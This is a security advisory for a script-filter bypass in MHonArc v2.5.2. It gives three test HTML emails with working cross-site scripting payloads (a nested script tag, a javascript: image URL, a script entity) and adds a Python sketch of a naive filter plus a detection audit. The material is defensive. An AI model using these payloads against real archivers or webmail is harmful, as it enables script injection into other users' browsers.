MHonArc v2.5.2 Script Filter Bypass Vulnerability

Published: 2002-04-20
Updated: 2002-04-20
Severity: Medium
Threat: Spoofing
Error type: Input validation error
Exploitation method: Server mode

Affected systems

MHonArc v2.5.2

Description

MHonArc is a tool that can filter script tags out of HTML mail. It contains a vulnerability that allows script markup to pass through unchecked.

Test code

Exploit 1:
----------
From: test@example.com
To: test@example.com
Date: Sun, 16 Dec 2001 00:00:00 +0900
Subject: test
MIME-Version: 1.0
Content-Type: text/html

<HTML>
<SCR<SCRIPT></SCRIPT>IPT>alert(document.domain)</SCR<SCRIPT></SCRIPT>IPT>
</HTML>
----------

Exploit 2:
----------
From: test@example.com
To: test@example.com
Date: Sun, 16 Dec 2001 00:00:00 +0900
Subject: test
MIME-Version: 1.0
Content-Type: text/html

<HTML>
<IMG SRC=javascript:alert(document.domain)>
</HTML>
----------

Exploit 3:
----------
From: test@example.com
To: test@example.com
Date: Sun, 16 Dec 2001 00:00:00 +0900
Subject: test
MIME-Version: 1.0
Content-Type: text/html

<HTML>
<B foo=&{alert(document.domain)};>
Vulnerable only if Netscape 4.x is used to browse.</B>
</HTML>
----------

Solution

Upgrade to the following version:

MHonArc v2.5.3
http://www.mhonarc.org/MHonArc/CHANGES
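The following is an added example, not MHonArc's code or part of the original advisory. It models a hypothetical single-pass script-tag stripper (`naive_strip`, an assumption about how such a filter might work) to show why the nested tag in test message 1 survives one pass, and adds a post-filter audit that also flags the `javascript:` URL and `&{...};` entity from test messages 2 and 3. All function names are illustrative.

```python
import re

# Bodies of the three test messages on this page, plus one constructed benign body.
SAMPLES = {
    "nested_tag": "<SCR<SCRIPT></SCRIPT>IPT>alert(document.domain)</SCR<SCRIPT></SCRIPT>IPT>",
    "js_url": "<IMG SRC=javascript:alert(document.domain)>",
    "js_entity": "<B foo=&{alert(document.domain)};>text</B>",
    "benign": "<B>hello</B> <IMG SRC=http://example.com/a.png>",
}

SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.I | re.S)

def naive_strip(html):
    """Hypothetical single-pass filter: delete each <script>...</script> once."""
    return SCRIPT_BLOCK.sub("", html)

def strip_to_fixed_point(html, max_rounds=10):
    """Re-run the removal until the output stops changing."""
    for _ in range(max_rounds):
        out = naive_strip(html)
        if out == html:
            break
        html = out
    return html

# Patterns for the three kinds of active content the test messages carry.
ACTIVE = [
    ("script tag", re.compile(r"<\s*/?\s*script\b", re.I)),
    ("script URL", re.compile(r"=\s*[\"']?\s*(?:javascript|vbscript)\s*:", re.I)),
    ("JS entity", re.compile(r"&\{")),
]

def residual_active_content(html):
    """Names of active-content patterns still present in already-filtered html."""
    return [name for name, rx in ACTIVE if rx.search(html)]

def audit(html):
    """Filter, then verify the *output*; a non-empty finding list means reject."""
    cleaned = strip_to_fixed_point(html)
    return cleaned, residual_active_content(cleaned)

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, "| single pass:", residual_active_content(naive_strip(body)),
              "| fixed point + audit:", audit(body)[1])
```

Pattern checks like these cover only the three cases on this page; an archiver is safer parsing the HTML and emitting only allowlisted tags, attributes and URL schemes.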